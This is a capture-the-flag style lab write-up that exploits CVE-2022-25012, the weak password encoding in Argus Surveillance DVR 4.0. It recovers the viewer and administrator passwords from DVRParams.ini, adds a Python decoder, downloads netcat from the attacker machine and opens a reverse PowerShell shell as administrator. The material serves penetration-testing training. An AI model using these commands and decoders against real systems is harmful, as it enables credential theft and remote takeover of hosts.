CVE-2022-25012


It has been established that the target Argus Surveillance DVR instance is running with the privileges of either administrator or SYSTEM. Additionally, it suffers from CVE-2022-25012.

A vulnerability classified as problematic has been found in Argus Surveillance DVR 4.0. This affects some unknown functionality. The manipulation with an unknown input leads to an inadequate encryption vulnerability. CWE classifies the issue as CWE-326: the product stores or transmits sensitive data using an encryption scheme that is theoretically sound, but is not strong enough for the level of protection required. This is going to have an impact on confidentiality.

Exploit


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/dvr4]
└─$ searchsploit -m windows/local/50130.py ; mv 50130.py CVE-2022-25012.py
  Exploit: Argus Surveillance DVR 4.0 - Weak Password Encryption
      URL: https://www.exploit-db.com/exploits/50130
     Path: /usr/share/exploitdb/exploits/windows/local/50130.py
    Codes: N/A
 Verified: True
File Type: ASCII text
Copied to: /home/kali/PEN-200/PG_PRACTICE/dvr4/50130.py

Exploit locally available

Exploitation


The C:\ProgramData\PY_Software\Argus Surveillance DVR\DVRParams.ini file contains the password hashes.

PS C:\ProgramData\PY_Software\Argus Surveillance DVR> cat DVRParams.ini | Select-String passwor*
 
DialUpPassword=
RecordEncryptionPassword=
TaskTrayPassword=
MotionEmailNeedPassword=0
MotionEmailPassword=
Password0=ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8
Password1=5E534D7B6069F641E03BD9BD956BC875EB603CD9D8E1BD8FAAFE

Those two password hashes belong to the Administrator and Viewer users.

Password1


Modifying the exploit script

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/dvr4]
└─$ python3 CVE-2022-25012.py
#########################################
#    _____ Surveillance DVR 4.0         #
#   /  _  \_______  ____  __ __  ______ #
#  /  /_\  \_  __ \/ ___\|  |  \/  ___/ #
# /    |    \  | \/ /_/  >  |  /\___ \  #
# \____|__  /__|  \___  /|____//____  > #
#         \/     /_____/            \/  #
#        Weak Password Encryption       #
############ @deathflash1411 ############
 
[+] 5E53:I
[+] 4D7B:m
[+] 6069:W
[+] F641:a
[+] E03B:t
[+] D9BD:c
[+] 956B:h
[+] C875:i
[+] EB60:n
[+] 3CD9:g
[+] D8E1:Y
[+] BD8F:0
[+] AAFE:u

Password is ImWatchingY0u

Validation ImWatchingY0u


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/dvr4]
└─$ sshpass -p ImWatchingY0u ssh viewer@$IP
 
 
Microsoft Windows [Version 10.0.19044.1645]
(c) Microsoft Corporation. All rights reserved.
 
C:\Users\viewer> whoami
dvr4\viewer
 
C:\Users\viewer> hostname
DVR4
 
C:\Users\viewer> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.150.179
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.150.254

Validated. The password belongs to the viewer user.

Password0


Modifying the exploit script

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/dvr4]
└─$ python3 CVE-2022-25012.py 
#########################################
#    _____ Surveillance DVR 4.0         #
#   /  _  \_______  ____  __ __  ______ #
#  /  /_\  \_  __ \/ ___\|  |  \/  ___/ #
# /    |    \  | \/ /_/  >  |  /\___ \  #
# \____|__  /__|  \___  /|____//____  > #
#         \/     /_____/            \/  #
#        Weak Password Encryption       #
############ @deathflash1411 ############
 
[+] ECB4:1
[+] 53D1:4
[+] 6069:W
[+] F641:a
[+] E03B:t
[+] D9BD:c
[+] 956B:h
[+] FE36:D
[+] BD8F:0
[+] 3CD9:g
[-] D9A8:Unknown

Executing the exploit script reveals the password: 14WatchD0g. However, the last character is unidentified: D9A8:Unknown.

D9A8:Unknown


The exploit author did not work on special characters. This would mean that D9A8 is likely a special character.

I will create a user with a password containing special characters: !@#$%^&*

PS C:\ProgramData\PY_Software\Argus Surveillance DVR> cat DVRParams.ini | Select-String password2
 
Password2=B39878A7

Interestingly, it only registered 2 characters. That seems to be the limit.

PS C:\ProgramData\PY_Software\Argus Surveillance DVR> cat DVRParams.ini | Select-String password2
 
Password2=78A7

Resetting the password to @ gives 78A7, so 78A7 is @.

PS C:\ProgramData\PY_Software\Argus Surveillance DVR> cat DVRParams.ini | Select-String password2
 
Password2=

Resetting the password to # fails, as it doesn’t recognize the # character.

PS C:\ProgramData\PY_Software\Argus Surveillance DVR> cat DVRParams.ini | Select-String password2
 
Password2=D9A8

Resetting the password to $ reveals the hash string D9A8, which matches. So the password is 14WatchD0g$.
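
Why the values in DVRParams.ini are cleartext-equivalent, as an added example that is not part of the original write-up or the Exploit-DB script: each 4-hex-digit block stands for one character through a fixed table, so the pairs already visible on this page are enough to read both entries. The function names are illustrative, and the table contains only pairs shown above.

```python
# Added example. Every block->character pair below is copied from the
# exploit output and the Password2 tests shown on this page.
SCRIPT_OUTPUT = {
    "5E53": "I", "4D7B": "m", "6069": "W", "F641": "a", "E03B": "t",
    "D9BD": "c", "956B": "h", "C875": "i", "EB60": "n", "3CD9": "g",
    "D8E1": "Y", "BD8F": "0", "AAFE": "u", "ECB4": "1", "53D1": "4",
    "FE36": "D",
}
PASSWORD0 = "ECB453D16069F641E03BD9BD956BFE36BD8F3CD9D9A8"
PASSWORD1 = "5E534D7B6069F641E03BD9BD956BC875EB603CD9D8E1BD8FAAFE"


def blocks(stored):
    """Split a stored value into 4-hex-digit blocks, one per character."""
    if len(stored) % 4 or any(c not in "0123456789ABCDEFabcdef" for c in stored):
        raise ValueError("expected hex text whose length is a multiple of 4")
    return [stored[i:i + 4].upper() for i in range(0, len(stored), 4)]


def learn(table, plaintext, stored):
    """Return a copy of table extended with a known plaintext/stored pair."""
    if len(stored) != 4 * len(plaintext):
        raise ValueError("plaintext and stored value differ in length")
    extended = dict(table)
    for block, char in zip(blocks(stored), plaintext):
        # A block that maps to two characters would disprove the fixed table.
        if extended.setdefault(block, char) != char:
            raise ValueError(f"{block} maps to two characters")
    return extended


def decode(table, stored, unknown="?"):
    """Look every block up in the table; unknown blocks become '?'."""
    return "".join(table.get(b, unknown) for b in blocks(stored))


def shared_blocks(a, b):
    """Blocks present in both values: evidence of a fixed, unsalted codebook."""
    return sorted(set(blocks(a)) & set(blocks(b)))


if __name__ == "__main__":
    print(shared_blocks(PASSWORD0, PASSWORD1))   # blocks the two entries share
    print(decode(SCRIPT_OUTPUT, PASSWORD0))      # last block still unknown
    table = learn(SCRIPT_OUTPUT, "@", "78A7")    # pair from the Password2 test
    table = learn(table, "$", "D9A8")            # pair from the Password2 test
    print(decode(table, PASSWORD0), decode(table, PASSWORD1))
```

The blocks shared between Password0 and Password1 show there is no salt or per-entry key, so read access to DVRParams.ini amounts to access to the stored passwords.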

Validation 14WatchD0g$


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/dvr4]
└─$ sshpass -p '14WatchD0g$' ssh administrator@$IP
Permission denied, please try again.

Failed to authenticate to the SSH server

runas

C:\Users\viewer> C:\Windows\System32\runas.exe /user:DVR4\administrator "powershell -c whoami > C:\out.txt"    
Enter the password for DVR4\administrator: 14WatchD0g$
Attempting to start powershell -c whoami > C:\out.txt as user "DVR4\administrator" ...
 
C:\Users\viewer> type C:\out.txt                                                                           
dvr4\administrator

Validated. It seems that the administrator user is not authorized to use SSH.

C:\Users\viewer> powershell -ep bypass -nop -c iwr -Uri http://192.168.45.209/nc64.exe -OutFile .\nc64.exe 
C:\Users\viewer> C:\Windows\System32\runas.exe /user:DVR4\administrator "C:\Users\viewer\nc64.exe 192.168.45.209 1234 -e powershell"
Enter the password for DVR4\administrator: 14WatchD0g$
Attempting to start C:\Users\viewer\nc64.exe 192.168.45.209 1234 -e powershell as user "DVR4\administrator" ...

Executing Netcat with runas.exe

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/dvr4]
└─$ nnc 1234                                                                   
listening on [any] 1234 ...
connect to [192.168.45.209] from (UNKNOWN) [192.168.150.179] 51873
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
 
Try the new cross-platform PowerShell https://aka.ms/pscore6
 
PS C:\WINDOWS\system32> whoami
whoami
dvr4\administrator
PS C:\WINDOWS\system32> hostname
hostname
DVR4
PS C:\WINDOWS\system32> ipconfig
ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.150.179
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.150.254

System level compromise